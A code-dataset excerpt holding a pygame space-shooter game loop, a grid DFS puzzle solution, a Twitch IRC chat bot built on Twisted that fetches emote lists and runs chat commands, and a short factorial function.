addComputerShip <= 0:\r\n # add a computer ship to the top left of screen\r\n newComputer = {'rect':pygame.Rect(computerStartPositionX, computerStartPositionY, computerShipWidth, computerShipHeight),\r\n 'dir':RIGHT,\r\n 'speed':computerSpeed,\r\n 'reload':computerReload,\r\n 'surface':pygame.transform.scale(enemyImageFlipped, (computerSize, computerSize))}\r\n computerShips.append(newComputer)\r\n addComputerShip = addComputerIncrement\r\n\r\n # move the player\r\n if moveLeft and playerShip['rect'].left > 0:\r\n playerShip['rect'].left -= playerShip['speed']\r\n playerShield.left -= playerShip['speed']\r\n if moveRight and playerShip['rect'].right < WINDOWWIDTH:\r\n playerShip['rect'].right += playerShip['speed']\r\n playerShield.right += playerShip['speed']\r\n\r\n # regenerate players shield\r\n if playerShieldRegenRate >= playerShieldRegenThresh and playerShieldHealth < playerShieldMax:\r\n playerShieldHealth += 1\r\n playerShieldRegenRate = 0\r\n\r\n # add player bullets if spacebar is down\r\n if addPlayerBullets and currentReload <= 0:\r\n # fire bullets from left and right of ship\r\n playerBullets.append(pygame.Rect(playerShip['rect'].right,playerShip['rect'].top,playerBulletWidth,playerBulletHeight))\r\n playerBullets.append(pygame.Rect(playerShip['rect'].left,playerShip['rect'].top,playerBulletWidth,playerBulletHeight))\r\n # reset the reload counter\r\n currentReload = reload\r\n \r\n # fire laser if upgrade was purchased\r\n if playerLaserTry or playerLaserOn:\r\n if playerLaserOwned and playerLaserCurrentReload <= 0 and playerLaserCurrentDuration >= 0:\r\n playerLaserOn = True\r\n if playerLaserCurrentDuration <= 0:\r\n playerLaserCurrentReload = playerLaserReload\r\n playerLaserCurrentDuration = playerLaserDuration\r\n playerLaserOn = False\r\n \r\n # move the players bullets\r\n for bullets in playerBullets[:]:\r\n bullets.top -= playerBulletSpeed\r\n\r\n # check if player laser collided with enemy ships\r\n for ships in computerShips[:]:\r\n for lasers in playerLaserList[:]: \r\n if lasers.colliderect(ships['rect']) and bulletHit == False:\r\n computerShips.remove(ships)\r\n playerScore += ((wave - 1) * 25) + 75\r\n playerCredits += ((wave - 1) * 25) + 75\r\n bulletHit = True\r\n\r\n # move the computers bullets\r\n for bullets in computerBullets[:]:\r\n bullets['rect'].top += computerBulletSpeed\r\n\r\n # move the players lasers\r\n if playerLaserOn:\r\n for lasers in playerLaserList[:]:\r\n lasers.left = playerShip['rect'].centerx\r\n\r\n # check if any computer ships have been hit by a player bullet\r\n for ships in computerShips[:]:\r\n for bullets in playerBullets[:]:\r\n if ships['rect'].colliderect(bullets) and bulletHit == False:\r\n playerBullets.remove(bullets)\r\n computerShips.remove(ships)\r\n playerScore += ((wave - 1) * 25) + 75\r\n playerCredits += ((wave - 1) * 25) + 75\r\n bulletHit = True\r\n\r\n # move the computer ships\r\n for ships in computerShips[:]:\r\n if ships['dir'] == RIGHT:\r\n ships['rect'].right += ships['speed']\r\n if ships['dir'] == LEFT:\r\n ships['rect'].left -= ships['speed']\r\n\r\n # have the computer ships fire bullets\r\n for ships in computerShips[:]:\r\n if ships['reload'] <= 0:\r\n computerShipsCannonX = ships['rect'].left\r\n computerShipsCannonY = ships['rect'].bottom\r\n newComputerBullet = {'rect':pygame.Rect(computerShipsCannonX, (computerShipsCannonY - 2), computerBulletWidth, computerBulletHeight),\r\n 'speed':computerBulletSpeed,\r\n 'surface':pygame.transform.scale(enemyBulletImage, 
(((computerBulletWidth*2)+1),(computerBulletHeight*2)))}\r\n computerBullets.append(newComputerBullet)\r\n ships['reload'] = (computerReload + random.randint(-10, 20))\r\n\r\n # check if the computer ships are trying to move off screen\r\n for ships in computerShips[:]:\r\n if ships['rect'].right >= WINDOWWIDTH:\r\n ships['rect'].top += (computerShipHeight + 2)\r\n ships['dir'] = LEFT\r\n if ships['rect'].left <= 0:\r\n ships['rect'].top += (computerShipHeight + 2)\r\n ships['dir'] = RIGHT\r\n \r\n # check if the players shields have been hit by computer bullets\r\n for bullets in computerBullets[:]:\r\n if playerShield.colliderect(bullets['rect']):\r\n if playerShieldHealth > 0:\r\n if wave > 10 and playerShieldHealth > 1:\r\n playerShieldHealth -= 1\r\n if wave > 20 and playerShieldHealth > 2:\r\n playerShieldHealth -= 1\r\n computerBullets.remove(bullets)\r\n playerShieldHealth -= 1\r\n\r\n # check if the players ship has been hit when the shields are down\r\n for bullets in computerBullets[:]:\r\n if playerShieldHealth <= 0:\r\n if playerShip['rect'].colliderect(bullets['rect']):\r\n computerBullets.remove(bullets)\r\n playerAlive = False\r\n gameLoop = 0\r\n \r\n # check if computer or player bullets are off the screen\r\n for bullets in computerBullets[:]:\r\n if bullets['rect'].bottom > (WINDOWHEIGHT + computerBulletHeight):\r\n computerBullets.remove(bullets)\r\n\r\n for bullets in playerBullets[:]:\r\n if bullets.top < -(playerBulletHeight):\r\n playerBullets.remove(bullets)\r\n \r\n # draw the black background onto the surface\r\n windowSurface.fill(BLACK)\r\n windowSurface.blit(backgroundRect, (0,0))\r\n \r\n\r\n # draw the player ship and shield onto the surface\r\n #pygame.draw.rect(windowSurface, WHITE, playerShip['rect'])\r\n windowSurface.blit(playerShip['surface'], ((playerShip['rect'].left - (playerWidth / 2)), (playerShip['rect'].top - (playerHeight / 2))))\r\n if playerShieldHealth > 0:\r\n windowSurface.blit(shieldRect, ((playerShield.left - shieldSpaceTop +1), (playerShield.top - shieldSpaceTop)))\r\n #pygame.draw.circle(windowSurface, LIGHTBLUE, playerShip['rect'].center, int(shieldRadius), playerShieldHealth)\r\n \r\n # draw the players bullets onto the surface\r\n for bullets in playerBullets[:]:\r\n #pygame.draw.rect(windowSurface, GREEN, bullets)\r\n playerBulletRect = pygame.transform.scale(playerBulletImage, ((playerBulletHeight*2), (playerBulletHeight*2)))\r\n windowSurface.blit(playerBulletRect, (bullets.left, bullets.top))\r\n\r\n # draw the players laser onto the surface\r\n if playerLaserOn:\r\n playerLaser = pygame.Rect(playerShip['rect'].centerx,(playerShip['rect'].top - 5),playerLaserWidth,-10)\r\n playerLaserExtension = pygame.Rect(playerShip['rect'].centerx,(playerLaser.top-extensionValue),playerLaserWidth,-10)\r\n pygame.draw.rect(windowSurface, DEEPPURPLE, playerLaser)\r\n while playerLaserExtension.top > 0:\r\n playerLaserExtension = pygame.Rect(playerShip['rect'].centerx,(playerLaser.top-extensionValue),playerLaserWidth,-10)\r\n playerLaserList.append(playerLaserExtension)\r\n extensionValue += 10\r\n \r\n for lasers in playerLaserList[:]:\r\n pygame.draw.rect(windowSurface, PURPLE, lasers)\r\n\r\n if not playerLaserOn:\r\n extensionValue = 0\r\n for lasers in playerLaserList[:]:\r\n playerLaserList.remove(lasers)\r\n \r\n # draw the computers bullets onto the surface\r\n for bullets in computerBullets[:]:\r\n #pygame.draw.rect(windowSurface, RED, bullets['rect'])\r\n windowSurface.blit(bullets['surface'], (bullets['rect'].left, 
bullets['rect'].top))\r\n\r\n # draw the computer ships onto the surface\r\n for ships in computerShips[:]:\r\n #pygame.draw.rect(windowSurface, GREEN, ships['rect'])\r\n windowSurface.blit(ships['surface'], ((ships['rect'].left - 4), (ships['rect'].top - 2)))\r\n\r\n # draw the dashboard onto the surface\r\n pygame.draw.rect(windowSurface, GREY, dashBoard)\r\n\r\n # draw the players shield display onto the surface\r\n shieldDisplay = pygame.Rect(5, (WINDOWHEIGHT - 20), (playerShieldHealth * 25), 10)\r\n shieldRegenDisplay = pygame.Rect(shieldDisplay.right, (WINDOWHEIGHT - 20), (playerShieldRegenRate / 8), 10)\r\n shieldRegenFiller = pygame.Rect(shieldDisplay.right, (WINDOWHEIGHT - 20), (playerShieldRegenThresh / 8), 10)\r\n pygame.draw.rect(windowSurface, LIGHTBLUE, shieldDisplay)\r\n pygame.draw.rect(windowSurface, DARKGREY, shieldRegenFiller)\r\n pygame.draw.rect(windowSurface, YELLOW, shieldRegenDisplay)\r\n drawText('Shields - Regen', smallFont, windowSurface, shieldDisplay.left, (shieldDisplay.top - 20), BLUE)\r\n\r\n # draw the players reload onto the surface\r\n reloadDisplay = pygame.Rect((WINDOWWIDTH - 40), (WINDOWHEIGHT - 20), currentReload, 10)\r\n reloadFiller = pygame.Rect((WINDOWWIDTH - 40), (WINDOWHEIGHT - 20), reload, 10)\r\n pygame.draw.rect(windowSurface, DARKGREY, reloadFiller)\r\n pygame.draw.rect(windowSurface, RED, reloadDisplay)\r\n drawText('Reload', smallFont, windowSurface, reloadDisplay.left, (reloadDisplay.top - 20), RED)\r\n\r\n # draw the players score onto the surface\r\n drawText('Score: %s' % playerScore, font, windowSurface, 1, 1, RED)\r\n\r\n # draw the wave onto the surface\r\n drawText('Wave: %s' % wave, font, windowSurface, 1, 15, YELLOW)\r\n\r\n # draw the players credits onto the surface\r\n drawText('Credits: $%s' % playerCredits, font, windowSurface, 1, 31, GREEN)\r\n \r\n # decrement the players reload time\r\n if currentReload > 0:\r\n currentReload -= 1\r\n # if the laser is firing, lower its current duration\r\n if playerLaserOn:\r\n playerLaserCurrentDuration -= 1\r\n if not playerLaserOn and playerLaserCurrentReload > 0 and playerLaserOwned:\r\n playerLaserCurrentReload -= 1\r\n \r\n # decrement all computer ships reload times\r\n for ships in computerShips[:]:\r\n if ships['reload'] > 0:\r\n ships['reload'] -= 1\r\n\r\n # reduce the time between computer spawns after a period of time\r\n if spawnRate <= 0:\r\n\r\n wave += 1\r\n \r\n if addComputerIncrement > 30:\r\n addComputerIncrement -= 7 # increase the rate at which computer ships are spawned\r\n if computerReload > 20: # increase the rate at which computer ships fire\r\n computerReload -= 1\r\n if bulletInflator <= 0: # increase the size of computer bullets\r\n if computerBulletWidth < 8:\r\n computerBulletWidth += 1\r\n computerBulletHeight += 1\r\n bulletInflator = 2\r\n\r\n if computerBulletWidth < 8:\r\n bulletInflator -= 1\r\n \r\n spawnRate = 2000 # reset the spawn rate cycle timer\r\n \r\n # decrement the computer ship, shield regen and spawn rate counters\r\n addComputerShip -= random.randint(1, 2) # add a random element to computer ship spawn, potentially doubling the rate\r\n spawnRate -= 1\r\n if playerShieldHealth < playerShieldMax:\r\n if playerShieldRegenRate <= playerShieldRegenThresh:\r\n playerShieldRegenRate += 1\r\n \r\n # draw the window onto the screen\r\n pygame.display.update()\r\n mainClock.tick(40)\r\n\r\n # handle the player's death\r\n windowSurface.fill(BLACK)\r\n drawText('You have died . . . 
press SPACE to continue', font, windowSurface, ((WINDOWWIDTH / 4) - 20), (WINDOWHEIGHT / 2), GREEN)\r\n drawText('Your score was: %s' % playerScore, font, windowSurface,(WINDOWWIDTH / 4), ((WINDOWHEIGHT / 2) + 20), GREEN)\r\n pygame.display.update()\r\n waitForPlayerToPressKey()\r\n \r\n","sub_path":"Python_Defender/pythonDefenderFullScreen.py","file_name":"pythonDefenderFullScreen.py","file_ext":"py","file_size_in_byte":30026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"69734129","text":"import sys\r\ndef read(): return sys.stdin.readline().strip()\r\n\r\nn = int(read())\r\nmatrix = [list(map(int, list(read()))) for _ in range(n)]\r\n\r\naboutX = [1,-1,0,0]\r\naboutY = [0,0,1,-1]\r\n\r\ndef dfs(matrix, count, x, y):\r\n matrix[x][y] = 0\r\n for i in range(4):\r\n dX = x + aboutX[i]\r\n dY = y + aboutY[i]\r\n if (dX >= 0) and (dY >= 0) and (dX < n) and (dY < n):\r\n if matrix[dX][dY] == 1:\r\n count = dfs(matrix, count+1, dX, dY)\r\n return count\r\n\r\nans = []\r\nfor i in range(n):\r\n for j in range(n):\r\n if matrix[i][j]==1:\r\n ans.append(dfs(matrix, 1, i, j))\r\n\r\nprint('group number: ',len(ans))\r\nfor i in sorted(ans):\r\n print(i)\r\n","sub_path":"BAEKJOON/[baek] 2667_dfs.py","file_name":"[baek] 2667_dfs.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"139347933","text":"\"\"\"Module for Twitch bot and threaded logging.\"\"\"\n\nfrom twisted.words.protocols import irc\nfrom twisted.internet import reactor\nfrom collections import defaultdict\nfrom bot.commands import Permission\nfrom threading import Thread\nimport traceback\nimport requests\nimport logging\nimport bot.commands\nimport bot.ranking\nimport bot.emotecounter\nimport signal\nimport json\nimport time\nfrom six.moves import input\nfrom importlib import reload\n\n\nUSERLIST_API = \"http://tmi.twitch.tv/group/user/{}/chatters\"\nTWITCHEMOTES_API = \"http://api.twitch.tv/kraken/chat/emoticon_images?emotesets=0\"\nGLOBAL_BTTVEMOTES_API = \"http://api.betterttv.net/2/emotes\"\nCHANNEL_BTTVEMOTES_API = \"http://api.betterttv.net/2/channels/{}\"\nHEARTHSTONE_CARD_API = \"http://api.hearthstonejson.com/v1/latest/enUS/cards.collectible.json\"\nEMOJI_API = \"https://raw.githubusercontent.com/github/gemoji/master/db/emoji.json\"\n\nwith open('configs/bot_config.json') as fp:\n CONFIG = json.load(fp)\n\nTRUSTED_MODS_PATH = 'data/trusted_mods.json'\nPRONOUNS_PATH = 'data/pronouns.json'\nPLEB_COOLDOWN = CONFIG[\"pleb_cooldown\"]\nPLEB_GAMETIMER = CONFIG[\"pleb_gametimer\"]\n\n\nclass TwitchBot(irc.IRCClient, object):\n \"\"\"TwitchBot extends the IRCClient to interact with Twitch.tv.\"\"\"\n\n last_warning = defaultdict(int)\n owner_list = CONFIG['owner_list']\n ignore_list = CONFIG['ignore_list']\n nickname = str(CONFIG['username'])\n clientID = str(CONFIG['clientID'])\n password = str(CONFIG['oauth_key'])\n cleverbot_key = str(CONFIG['cleverbot_key'])\n channel = \"#\" + str(CONFIG['channel'])\n\n trusted_mods_path = TRUSTED_MODS_PATH\n pronouns_path = PRONOUNS_PATH\n\n host_target = False\n pause = True\n commands = []\n gameRunning = False\n antispeech = False # if a command gets executed which conflicts with native speech\n pyramidBlock = False\n pleb_cooldowntime = PLEB_COOLDOWN # time between non-sub commands\n pleb_gametimer = PLEB_GAMETIMER # time between pleb games\n last_plebcmd = time.time() - pleb_cooldowntime\n last_plebgame = time.time() - pleb_gametimer\n\n ranking = 
bot.ranking.Ranking()\n\n with open(TRUSTED_MODS_PATH) as fp:\n trusted_mods = json.load(fp)\n\n with open(PRONOUNS_PATH) as fp:\n pronouns = json.load(fp)\n\n def signedOn(self):\n \"\"\"Call when first signed on.\"\"\"\n self.factory.wait_time = 1\n logging.warning(\"Signed on as {}\".format(self.nickname))\n\n signal.signal(signal.SIGINT, self.manual_action)\n\n # When first starting, get user list\n url = USERLIST_API.format(self.channel[1:])\n data = requests.get(url).json()\n self.users = set(sum(data['chatters'].values(), []))\n self.mods = set()\n self.subs = set()\n\n \"\"\"On first start, get twitchtv-emotelist\"\"\"\n url = TWITCHEMOTES_API\n data = requests.get(url).json()\n emotelist = data['emoticon_sets']['0']\n\n self.twitchemotes = []\n for i in range(0, len(emotelist)):\n emote = emotelist[i]['code'].strip()\n if ('\\\\') not in emote:\n self.twitchemotes.append(emote)\n\n \"\"\"On first start, get global_BTTV-emotelist\"\"\"\n url = GLOBAL_BTTVEMOTES_API\n data = requests.get(url).json()\n emotelist = data['emotes']\n\n self.global_bttvemotes = []\n for i in range(0, len(emotelist)):\n emote = emotelist[i]['code'].strip()\n self.global_bttvemotes.append(emote)\n\n \"\"\"On first start, get channel_BTTV-emotelist\"\"\"\n url = CHANNEL_BTTVEMOTES_API.format(self.channel[1:])\n data = requests.get(url).json()\n emotelist = data['emotes']\n\n self.channel_bttvemotes = []\n for i in range(0, len(emotelist)):\n emote = emotelist[i]['code'].strip()\n self.channel_bttvemotes.append(emote)\n\n \"\"\"All available emotes in one list\"\"\"\n self.emotes = self.twitchemotes + self.global_bttvemotes + self.channel_bttvemotes\n\n \"\"\"On first start, get all hearthstone cards\"\"\"\n url = HEARTHSTONE_CARD_API\n self.cards = requests.get(url).json()\n\n \"\"\"On first start get all emojis\"\"\"\n url = EMOJI_API\n self.emojilist = requests.get(url).json()\n self.emojis = []\n for i in range(0, len(self.emojilist)):\n try:\n self.emojis.append(self.emojilist[i]['emoji'])\n except KeyError:\n pass # No Emoji found.\n\n \"\"\"Initialize emotecounter\"\"\"\n self.ecount = bot.emotecounter.EmoteCounter(self)\n self.ecount.startCPM()\n\n # Get data structures stored in factory\n self.activity = self.factory.activity\n self.tags = self.factory.tags\n\n # Load commands\n self.reload_commands()\n\n # Join channel\n self.sendLine(\"CAP REQ :twitch.tv/membership\")\n self.sendLine(\"CAP REQ :twitch.tv/commands\")\n self.sendLine(\"CAP REQ :twitch.tv/tags\")\n self.join(self.channel)\n\n def joined(self, channel):\n \"\"\"Log when channel is joined.\"\"\"\n logging.warning(\"Joined %s\" % channel)\n\n def privmsg(self, user, channel, msg):\n \"\"\"React to messages in the channel.\"\"\"\n # Extract twitch name\n name = user.split('!', 1)[0]\n\n # Catch twitch specific commands\n if name in [\"jtv\", \"twitchnotify\"]:\n self.jtv_command(msg)\n return\n\n # Log the message\n logging.info(\"{}: {}\".format(name, msg))\n\n # Ignore messages by ignored user\n if name in self.ignore_list:\n return\n\n # Ignore message sent to wrong channel\n if channel != self.channel:\n return\n\n self.ranking.incrementPoints(name, 1, self)\n\n # Check if bot is paused\n if not self.pause or name in self.owner_list or name in self.trusted_mods:\n self.process_command(name, msg)\n\n # Log user activity\n self.activity[name] = time.time()\n\n def modeChanged(self, user, channel, added, modes, args):\n \"\"\"Not sure what this does. 
In practice it is called when user modes change; we use it to keep the mod list up to date.\"\"\"\n if channel != self.channel:\n return\n\n # Keep mod list up to date\n func = 'add' if added else 'discard'\n for name in args:\n getattr(self.mods, func)(name)\n\n change = 'added' if added else 'removed'\n info_msg = \"Mod {}: {}\".format(change, ', '.join(args))\n logging.warning(info_msg)\n\n def userJoined(self, user, channel):\n \"\"\"Update user list when user joins.\"\"\"\n if channel == self.channel:\n self.users.add(user)\n\n def userLeft(self, user, channel):\n \"\"\"Update user list when user leaves.\"\"\"\n if channel == self.channel:\n self.users.discard(user)\n\n def parsemsg(self, s):\n \"\"\"Break a message from an IRC server into its prefix, command, and arguments.\"\"\"\n tags = {}\n prefix = ''\n trailing = []\n if s[0] == '@':\n tags_str, s = s[1:].split(' ', 1)\n tag_list = tags_str.split(';')\n tags = dict(t.split('=') for t in tag_list)\n if s[0] == ':':\n prefix, s = s[1:].split(' ', 1)\n if s.find(' :') != -1:\n s, trailing = s.split(' :', 1)\n args = s.split()\n args.append(trailing)\n else:\n args = s.split()\n command = args.pop(0).lower()\n return tags, prefix, command, args\n\n def pronoun(self, user):\n \"\"\"Get the proper pronouns for a user.\"\"\"\n if user in self.pronouns:\n return self.pronouns[user]\n else:\n return [\"he\", \"him\", \"his\"]\n\n def lineReceived(self, line):\n \"\"\"Parse IRC line.\"\"\"\n line = line.decode(\"utf-8\")\n # First, we check for any custom twitch commands\n tags, prefix, cmd, args = self.parsemsg(line)\n\n if cmd == \"hosttarget\":\n self.hostTarget(*args)\n elif cmd == \"clearchat\":\n self.clearChat(*args)\n elif cmd == \"notice\":\n self.notice(tags, args)\n elif cmd == \"privmsg\":\n self.userState(prefix, tags)\n\n # Remove tag information\n if line[0] == \"@\":\n line = line.split(' ', 1)[1]\n\n # Then we let IRCClient handle the rest\n super().lineReceived(line)\n\n def hostTarget(self, channel, target):\n \"\"\"Track and update hosting status.\"\"\"\n target = target.split(' ')[0]\n if target == \"-\":\n self.host_target = None\n logging.warning(\"Exited host mode\")\n else:\n self.host_target = target\n logging.warning(\"Now hosting {}\".format(target))\n\n def clearChat(self, channel, target=None):\n \"\"\"Log chat clear notices.\"\"\"\n if target:\n logging.warning(\"{} was timed out\".format(target))\n else:\n logging.warning(\"chat was cleared\")\n\n def notice(self, tags, args):\n \"\"\"Log all chat mode changes.\"\"\"\n if \"msg-id\" not in tags:\n return\n\n msg_id = tags['msg-id']\n if msg_id == \"subs_on\":\n logging.warning(\"Subonly mode ON\")\n elif msg_id == \"subs_off\":\n logging.warning(\"Subonly mode OFF\")\n elif msg_id == \"slow_on\":\n logging.warning(\"Slow mode ON\")\n elif msg_id == \"slow_off\":\n logging.warning(\"Slow mode OFF\")\n elif msg_id == \"r9k_on\":\n logging.warning(\"R9K mode ON\")\n elif msg_id == \"r9k_off\":\n logging.warning(\"R9K mode OFF\")\n\n def userState(self, prefix, tags):\n \"\"\"Track user tags.\"\"\"\n name = prefix.split(\"!\")[0]\n self.tags[name].update(tags)\n\n if 'subscriber' in tags:\n if tags['subscriber'] == '1':\n self.subs.add(name)\n elif name in self.subs:\n self.subs.discard(name)\n\n if 'user-type' in tags:\n if tags['user-type'] == 'mod':\n self.mods.add(name)\n elif name in self.mods:\n self.mods.discard(name)\n\n def write(self, msg):\n \"\"\"Send message to channel and log it.\"\"\"\n self.msg(self.channel, msg)\n logging.info(\"{}: {}\".format(self.nickname, msg))\n\n def 
get_permission(self, user):\n \"\"\"Return the users permission level.\"\"\"\n if user in self.owner_list:\n return Permission.Admin\n elif user in self.mods:\n return Permission.Moderator\n elif user in self.subs:\n return Permission.Subscriber\n return Permission.User\n\n def select_commands(self, perm):\n \"\"\"If a game is active and plebcommands on cooldown, only iterate through game list.\n\n If no game is active only allow 'passive games' a.k.a. PyramidGame\n \"\"\"\n if perm == 0:\n if (time.time() - self.last_plebcmd < self.pleb_cooldowntime):\n if self.gameRunning:\n return self.games\n else:\n return self.passivegames\n else:\n return self.commands\n else:\n return self.commands\n\n def process_command(self, user, msg):\n \"\"\"Process messages and call commands.\"\"\"\n perm_levels = ['User', 'Subscriber', 'Moderator', 'Owner']\n perm = self.get_permission(user)\n msg = msg.strip()\n self.cmdExecuted = False\n\n \"\"\"Emote Count Function\"\"\"\n self.ecount.process_msg(msg)\n\n \"\"\"Limit pleb bot spam. Only allow certain commands to be processed by plebs, if plebcmds on cooldown.\"\"\"\n cmdlist = self.select_commands(perm)\n\n # Flip through commands and execute every one that matches.\n # Check if user has permission to execute command.\n # Also reduce warning message spam by limiting it to one per minute.\n for cmd in cmdlist:\n try:\n match = cmd.match(self, user, msg)\n if not match:\n continue\n cname = cmd.__class__.__name__\n if perm < cmd.perm:\n if time.time() - self.last_warning[cname] < 60:\n continue\n self.last_warning[cname] = time.time()\n reply = \"{}: You don't have access to that command. Minimum level is {}.\"\n self.write(reply.format(user, perm_levels[cmd.perm]))\n else:\n if (perm == 0 and cmd not in self.games): # Only reset plebtimer if no game was played\n self.last_plebcmd = time.time()\n cmd.run(self, user, msg)\n except (ValueError, TypeError): # Not sure which Errors might happen here.\n logging.error(traceback.format_exc())\n \"\"\"Reset antispeech for next command\"\"\"\n self.antispeech = False\n\n def manual_action(self, *args):\n \"\"\"Allow manual command input.\"\"\"\n self.terminate()\n return\n\n # Always terminate. 
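Everything below the early return is dead code, kept only as a reference for an interactive console. 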
For now this won't be used.\n cmd = input(\"Command: \").strip()\n if cmd == \"q\": # Stop bot\n self.terminate()\n elif cmd == 'r': # Reload bot\n self.reload()\n elif cmd == 'rc': # Reload commands\n self.reload_commands()\n elif cmd == 'p': # Pause bot\n self.pause = not self.pause\n elif cmd == 'd': # try to enter debug mode\n IPythonThread(self).start()\n elif cmd.startswith(\"s\"):\n # Say something as the bot\n self.write(cmd[2:])\n\n def jtv_command(self, msg):\n \"\"\"Send a message when someone subscribes.\"\"\"\n if \"subscribed\" in msg:\n # Someone subscribed\n logging.warning(msg)\n\n reply = \"Thanks for subbing!\"\n if \" just subscribed\" in msg:\n user = msg.split(' just ')[0]\n reply = \"{}: {}\".format(user, reply)\n elif \" subscribed for\" in msg:\n user = msg.split(\" subscribed for\")[0]\n reply = \"{}: {}\".format(user, reply)\n self.write(reply)\n\n def get_active_users(self, t=60*10):\n \"\"\"Return list of users active in chat in the past t seconds (default: 10m).\"\"\"\n now = time.time()\n active_users = []\n for user, last in self.activity.items():\n if now - last < t:\n active_users.append(user)\n\n return active_users\n\n def close_commands(self):\n \"\"\"Gracefully end commands.\"\"\"\n for cmd in self.commands:\n try:\n cmd.close(self)\n except (TypeError, ValueError): # Not sure which Errors might happen here.\n logging.error(traceback.format_exc())\n\n def reload_commands(self):\n \"\"\"Reload commands.\"\"\"\n logging.warning(\"Reloading commands\")\n\n # Reload commands\n self.close_commands()\n\n cmds = reload(bot.commands)\n\n \"\"\"Number of games.\n Games have to be on the top of the list!!!\n Passive Games have to be on the very top!!! -> Maybe we need Game-classes\n \"\"\"\n ngames = 5 # first ngames are 'games'\n self.games = []\n npassivegames = 1 # first npassivegames are 'always active games' (e.g. 
PyramidGame)\n self.passivegames = []\n\n self.commands = [\n cmds.Pyramid(self),\n cmds.KappaGame(self),\n cmds.GuessEmoteGame(self),\n cmds.GuessMinionGame(self),\n cmds.MonkalotParty(self),\n cmds.Sleep(self),\n cmds.EditCommandList(self),\n cmds.editQuoteList(self),\n cmds.outputQuote(self),\n cmds.outputStats(self),\n cmds.Calculator(self),\n cmds.AutoGames(self),\n cmds.PyramidReply(self),\n cmds.EmoteReply(self),\n cmds.Smorc(self),\n cmds.Rank(self),\n cmds.EditCommandMods(self),\n cmds.Pronouns(self),\n cmds.Questions(self),\n cmds.Oralpleasure(self),\n cmds.Speech(self),\n cmds.SimpleReply(self),\n cmds.PyramidBlock(self),\n cmds.Spam(self),\n cmds.TopSpammers(self)\n ]\n\n for i in range(0, ngames):\n self.games.append(self.commands[i])\n\n for i in range(0, npassivegames):\n self.passivegames.append(self.commands[i])\n\n def reload(self):\n \"\"\"Reload bot.\"\"\"\n logging.warning(\"Reloading bot!\")\n self.close_commands()\n self.quit()\n\n def terminate(self):\n \"\"\"Terminate bot.\"\"\"\n self.close_commands()\n reactor.stop()\n\n def displayName(self, user):\n \"\"\"Get the proper capitalization of a twitch user.\"\"\"\n url = \"https://api.twitch.tv/kraken/users?login=\" + user\n headers = {'Accept': 'application/vnd.twitchtv.v5+json', 'Client-ID': self.password}\n\n try:\n return requests.get(url, headers=headers).json()[\"users\"][0][\"display_name\"]\n except (IndexError, KeyError):\n return user\n\n def getuserTag(self, username):\n \"\"\"Get the twitch-userTag from username.\"\"\"\n url = \"https://api.twitch.tv/kraken/users?login=\" + username\n headers = {'Accept': 'application/vnd.twitchtv.v5+json', 'Client-ID': self.clientID, 'Authorization': self.password}\n\n try:\n return requests.get(url, headers=headers).json()\n except (IndexError, KeyError):\n pass\n\n def getuserID(self, username):\n \"\"\"Get the twitch-userTag from username.\"\"\"\n return self.getuserTag(username)[\"users\"][0][\"_id\"]\n\n def getuserEmotes(self, userID):\n \"\"\"Get the emotes a user can use from userID without the global emoticons.\"\"\"\n url = \"https://api.twitch.tv/kraken/users/{}/emotes\".format(userID)\n headers = {'Accept': 'application/vnd.twitchtv.v5+json', 'Client-ID': self.clientID, 'Authorization': self.password}\n\n try:\n emotelist = requests.get(url, headers=headers).json()['emoticon_sets']\n except (IndexError, KeyError):\n print(\"Error in getting emotes from userID\")\n return {} # avoid a NameError below when the request fails\n\n emotelist.pop('0', None)\n return emotelist\n\n def accessToEmote(self, username, emote):\n \"\"\"Check if user has access to a certain emote.\"\"\"\n userID = self.getuserID(username)\n emotelist = self.getuserEmotes(userID)\n for sets in emotelist:\n for key in range(0, len(emotelist[sets])):\n if emote == emotelist[sets][key]['code']:\n return True\n return False\n\n def getChannel(self, channelID):\n \"\"\"Get the subscriberemotes from channelID.\"\"\"\n url = \"https://api.twitch.tv/kraken/channels/\" + channelID\n headers = {'Accept': 'application/vnd.twitchtv.v5+json', 'Client-ID': self.clientID, 'Authorization': self.password}\n\n try:\n return requests.get(url, headers=headers).json()\n except (IndexError, KeyError):\n print(\"Channel object could not be fetched.\")\n\n def setlast_plebgame(self, last_plebgame):\n \"\"\"Set timer of last_plebgame.\"\"\"\n self.last_plebgame = last_plebgame\n\n\nclass IPythonThread(Thread):\n \"\"\"An IPython thread. 
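Embeds an interactive IPython shell with the bot object in scope. 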
Used for debug mode.\"\"\"\n\n def __init__(self, b):\n \"\"\"Initialize thread.\"\"\"\n Thread.__init__(self)\n self.bot = b\n\n def run(self):\n \"\"\"Enter debug mode.\"\"\"\n logger = logging.getLogger()\n handler = logger.handlers[0]\n handler.setLevel(logging.ERROR)\n try:\n from IPython import embed\n bot = self.bot\n embed()\n del bot\n except ImportError:\n logging.error(\"IPython not installed, cannot debug.\")\n handler.setLevel(logging.INFO)\n","sub_path":"bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":19811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"58931941","text":"# libraries\n\n# import ingreso_datos as igr # import my script under an alias\n\n# constants\n\n# functions and/or classes\n\ndef factorial(num):\n fact = 1\n for i in range(1, num + 1):\n fact = fact * i\n return fact\n\n\n\n# my program\nif __name__ == '__main__':\n # demo\n print(factorial(5))\n\n\n","sub_path":"Modulo3/scripts/programa/mate/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
